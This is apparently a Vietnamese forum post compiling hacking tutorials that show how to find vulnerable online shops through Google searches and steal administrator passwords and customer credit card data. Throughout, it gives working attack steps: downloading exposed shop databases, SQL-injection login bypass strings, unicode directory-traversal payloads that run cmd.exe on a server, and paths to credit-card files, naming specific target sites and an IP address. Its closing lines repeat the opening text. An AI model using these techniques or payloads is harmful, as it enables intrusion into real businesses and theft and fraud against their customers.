TUTORIAL FORM jonnyhackstuff Mức độ nguy hiểm : khá cao tỷ lệ thành công :80% Tool :+ site http://google.com.vn/ + PC của bạn cài Access ( dùng để xem file .mdb) Hiện các Shop DUpaypal rất nhiều và hàu như chưa fix được mấy bằng chứng là tấn công 10 site thì 8 site dính :D) Tiến hành: Lên http://google.com.vn/ Search với từ khóa "Powered by DUpaypal -siteduware.com" bạn sẻ thấy rất nhiều site dính Bug này, Chọn victim để test nào ở đây kieptinhchung chọn cái này: http://www.xcel-leadership.com/sermon/deta .ro=147&iType=18 bi giờ thêm vào sau Nó : /_private/DUpaypal.mdb để Dowload file chứa thông tin về U/P của Admin về , tức là ta sẻ dùng link sau để dowload nó: http://www.xcel-leadership.com/sermon/_private/DUpaypal.mdb sau khi dowload về bạn sẻ xem Nó dưới dạng Accees, tìm phần User và lấy user+pass đăng nhập thật dễ dàng , như vậy là bạn đã làm chủ Shop đó roài đó. TUTORIAL BY HCEGROUP I-Lỗi Tek9.asp : Cách thức tìm : Dùng Google Câu tìm kiếm : tek9.asp Kết quả : Bạn tìm các trang web hiện lên , ví dụ làhttp://198.170.250.68/ tek9_login.asp Bạn sẽ thêm intranet trước tek9.asp http://198.170.250.68/intranet/tek9_login.asp Được gì ? Bạn vào trang đăng nhập của người quản trị. Tên và mật khẩu : Đều là 'or''=' Sau đó ? Bạn tự tìm hiểu vì mỗi trang có 1 sự trình bày hơi khác nhau. Trang trên cho phép bạn quản lý thông số , kiểu , cách thức và vài chỗ có liên quan đến cơ sở dữ liệu chứa thẻ tín dụng. Ngòai ra bạn có thể tìm lệnh Find orders để truy tìm khu vực chức thẻ. ============================ II-Lỗi Cart32 v3.5a Cách thức tìm : Dùng Google Câu tìm kiếm : Cart32 v3.5a Kết quả : Chạy các trang web có tập tin cart32.exe . Bạn sẽ nhận được 1 số thông tin Được gì ? Chưa được gì hết Tên và mật khẩu : Không cần Sau đó ? Giả sử bạn kiếm được trang web sau có lỗi http://www.connectionsmall.com/scripts/cart32.exe/ Bạn thay từ card32.exe bằng những dòng sau đây : I) %e0%80%af / %e0%80%af / %e0%80%af /winnt/system32/cmd.exe?/c+dir+c:\ II) %c0%af %c0%af %c0%af %c0%af /winnt/system32/cmd.exe?/c+dir+c:\ III) %c1%9c /winnt/system32/cmd.exe?/c+dir+c:\ Ví dụ : http://www.connectionsmall.com/scripts/ À¯ À¯ À¯ À¯ /winnt/system32/cmd.exe?/c+dir+c:\ -Nếu không chuyện gì xảy ra thì bạn thêm dòng địa chỉ sau vào cuối cùng để lấy thẻ tín dụng : \progra~1\MWAInc\Cart32\ -Bạn sẽ thấy những dòng giống như sau : 2814659000-001001.c32 2814659000-001002.c32 2814659000-001003.c32 -Bây giờ tất những gì cần phải làm là bạn thêm 1 trong ba hoặc thử thì dùng từng cái vào cuối địa chỉ trên. Sau cùng ta sẽ có giống như thế này : http://www.connectionsmall.com/scripts/ À¯ À¯ À¯ À¯ /winnt/system32/cmd.exe?/c+dir+c:\progra~1\MWAInc \Cart32\2814659000-001001.c32 ============================ III-Lỗi Commerce.cgi Cách thức tìm : Dùng Google Câu tìm kiếm : Commerce.cgi Kết quả : Chạy các trang web có tập tin Commerce.cgi. Giả sử bạn kiếm được trang web sau có lỗi http://www.warresisters.org/store/commerce.cgi Bạn thay từ commerce.cgi bằng admin_files/commerce_user_lib.pl Ví dụ : http://www.warresisters.org/store/admin_files/commerce_user_lib.pl Bạn sẽ nhận được 1 số thông tin : $sc_sales_tax = ".0825"; $sc_sales_tax_state = "NY"; $sc_send_order_to_email = "yes"; $sc_order_log_name = "onlinebookstore.log"; $sc_send_order_to_log = "yes"; $shipping_percentage = ".15"; $sc_order_email = "wrl\@igc.org"; $sc_root_url = "http://www.warresisters.org/store"; $sc_admin_email = "lit\@warresisters.org"; $sc_domain_name_for_cookie = ".warresisters.org"; $sc_order_script_url = "https://secure.serve.com/resist/store/commerce.cgi"; $sc_root_web_path = "/home/serve/resist/Html/Products"; $sc_path_for_cookie = "/store"; $path_to_html = " /Html"; 1; Được gì ? 1 số thông tin quan trọng về cơ sở dữ liệu Tên và mật khẩu : Không cần Sau đó Xóa cái commerce_user_lib.pl đi thay bằng dòng chữ tìm ở $sc_order_log_name và ============================ III-Lỗi shopdisplaycategories Cách thức tìm : Dùng Google Câu tìm kiếm : shopdisplaycategories Kết quả : Trong link các trang bị lỗi , bạn thay shopdisplaycategories.asp thành shopdbtest.asp Được gì ? Bạn biết được đường dẫn để tải cơ sở dữ liệu Thẻ Tín Dụng Tên và mật khẩu : Không cần Sau đó : Thay shopdbtest.asp bằng phần trả lời của xdatabase ( bạn tìm ở phía trên ) ============================ IV-Lỗi SQL Injection Cách thức tìm : Dùng Google Câu tìm kiếm : admentor Kết quả : Bạn vào trang bị lỗi , đăng nhập với Username và Password là 'or''=' Được gì ? Bây giờ bạn nắm mọi họat động quản lý của website trong vai Admin Tên và mật khẩu : 'or''=' Sau đó : Bạn tự tìm hiểu ============================ IV-Lỗi datasources Cách thức tìm : Dùng Google Câu tìm kiếm : datasources/ hay config/datasources/ Kết quả :Đường dẫn những trang bị lỗi này Được gì ? Từ đây bạn thêm vào expire.mdb vào sau datasources/ hay config/datasources/ Tên và mật khẩu : Không cần Sau đó : Bãn tải được kho dữ liệu có credit card . TUTORIAL FORM jonnyhackstuff Mức độ nguy hiểm : khá cao tỷ lệ thành công :80% Tool. user+pass đăng nhập thật dễ dàng , như vậy là bạn đã làm chủ Shop đó roài đó. TUTORIAL BY HCEGROUP I-Lỗi Tek9.asp : Cách thức tìm : Dùng Google Câu tìm kiếm